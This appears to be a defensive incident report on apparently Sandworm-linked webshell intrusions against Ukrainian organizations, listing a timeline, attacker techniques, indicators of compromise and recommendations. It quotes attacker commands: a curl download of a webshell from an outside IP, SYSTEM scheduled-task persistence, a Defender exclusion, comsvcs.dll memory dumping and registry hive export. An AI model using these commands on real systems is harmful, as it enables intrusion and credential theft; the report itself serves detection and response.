Full Report
Attackers are gaining access using a custom, Sandworm-linked webshell and are making heavy use of Living-off-the-Land tactics to maintain persistent access.
Analysis Summary
# Incident Report: Sandworm-Linked Webshell Intrusion in Ukrainian Organizations
## Executive Summary
Threat actors, potentially linked to the Russian Sandworm group, conducted targeted, multi-stage intrusions against Ukrainian organizations, including a large business services firm and a local government entity. Access was achieved via custom webshells deployed on public-facing servers, followed by heavy reliance on Living-off-the-Land (LotL) techniques to achieve persistence and conduct reconnaissance. The primary goal appeared to be harvesting sensitive information and maintaining long-term network presence.
## Incident Details
- Discovery Date: Investigation started after observing activity beginning June 27, 2025.
- Incident Date: Initial malicious activity detected on June 27, 2025.
- Affected Organization: A large business services organization (primary focus of timeline) and a local government organization.
- Sector: Business Services, Local Government.
- Geography: Ukraine.
## Timeline of Events
### Initial Access
- Date/Time: June 27, 2025
- Vector: Exploitation of unpatched vulnerabilities on public-facing servers, leading to webshell deployment.
- Details: Attackers used `curl` from IP `185.145.245[.]209` to download and install a webshell named `service.aspx`. One identified webshell, Localolive, is linked to a Sandworm subgroup.
### Lateral Movement
- Date/Time: June 29, 2025 (and subsequent activity)
- Vector: Internal reconnaissance and presumed lateral movement.
- Details: After establishing persistence on the first host, attackers performed extensive reconnaissance (e.g., `Get-AdComputer -filter *`) and shortly after moved to a second internal computer, checking for security software presence.
### Data Exfiltration/Impact
- Date/Time: Ongoing after initial access.
- Details: The goal was harvesting sensitive information. Attackers attempted memory dumping via scheduled tasks and exported the HKLM system registry hive, suggesting an intent to steal credentials and configuration data.
### Detection & Response
- Date/Time: Investigation initiated by the Threat Hunter Team following observed activity.
- Details: Detection relied on analyzing network connections and file creations. Response activities would involve standard containment/eradication procedures against the deployed webshells and LotL activity, though specific response actions against the intrusions are not fully detailed in the context provided.
## Attack Methodology
- Initial Access: Deployment of custom webshells (e.g., Localolive, `service.aspx`) likely via web application exploitation.
- Persistence: Creation of a recurring scheduled task (`schtasks /create`) set to run every 30 minutes using the `SYSTEM` context with the highest privilege level (`/rl highest`).
- Privilege Escalation: Implied by the ability to create a scheduled task running as `SYSTEM` with highest rights, and a Windows Defender exclusion rule applied.
- Defense Evasion: Modifying Windows Defender to exclude the Downloads folder (`Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads`) to hide downloaded tools. Heavy reliance on LotL tactics.
- Credential Access: Attempted memory dumping via scheduled task (`rundll32.exe c:\windows\system32\comsvcs.dll, minidump...`) and registry hive extraction (`reg.exe save hklm\system...`).
- Discovery: Extensive use of native OS tools like `whoami`, `tasklist`, `systeminfo`, `arp -a`, and Active Directory enumeration (`powershell Get-AdComputer -filter *`).
- Lateral Movement: Checking for security products (Symantec) on subsequent hosts and enumerating user files.
- Collection: Gathering password hashes/credentials via memory dumps and system configuration via registry extraction.
- Exfiltration: Not explicitly detailed, but implied by the objective of "harvesting sensitive information."
- Impact: Espionage and establishing long-term backdoor presence.
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: Highly likely unauthorized access and collection of sensitive information, including credentials harvested from memory and system configurations.
- Operational: Potential disruption due to ongoing monitoring and configuration changes (e.g., disabling security features).
- Reputational: Targeted organizations may suffer reputational damage due to the nature of the espionage activity.
## Indicators of Compromise
- File indicators:
- Localolive Webshell: `636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb`
- PowerShell Backdoors: Example hashes include `cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7`
- Network indicators:
- Initial access IP: `185.145.245[.]209`
- Domain observed: `ciscoheartbeat[.]com` (likely a C2/staging domain)
## Response Actions
- Containment measures: Not explicitly detailed, but would involve isolating compromised hosts, blocking malicious IPs, and removing initial webshells.
- Eradication steps: Removal of scheduled tasks (`asd`), removal of persistence mechanisms, and scanning for the full array of deployed executables/backdoors.
- Recovery actions: Restoring Defender configurations, resetting potentially compromised credentials, and patching vulnerabilities used for initial access.
## Lessons Learned
- The heavy reliance on Living-off-the-Land binaries (LOLBins) and dual-use tools makes detection challenging, necessitating focus on behavioral analysis rather than just signature matching.
- The use of custom, Sandworm-linked tools suggests a sophisticated, state-sponsored actor demanding high-level threat intelligence integration.
- Failure to promptly patch public-facing vulnerabilities directly enabled the initial compromise.
## Recommendations
- Immediately review and patch all web-facing applications susceptible to known vulnerabilities, as this was the likely vector.
- Implement robust behavioral monitoring across endpoints to detect unexpected use of legitimate tools like `cmd.exe`, `powershell.exe`, and `schtasks.exe` for anomalous actions (e.g., memory dumping, registry exporting).
- Enhance Privilege Access Management (PAM) to prevent low-level processes from creating system-level scheduled tasks.
- Develop specific detection rules for the identified webshell file hashes and network indicators.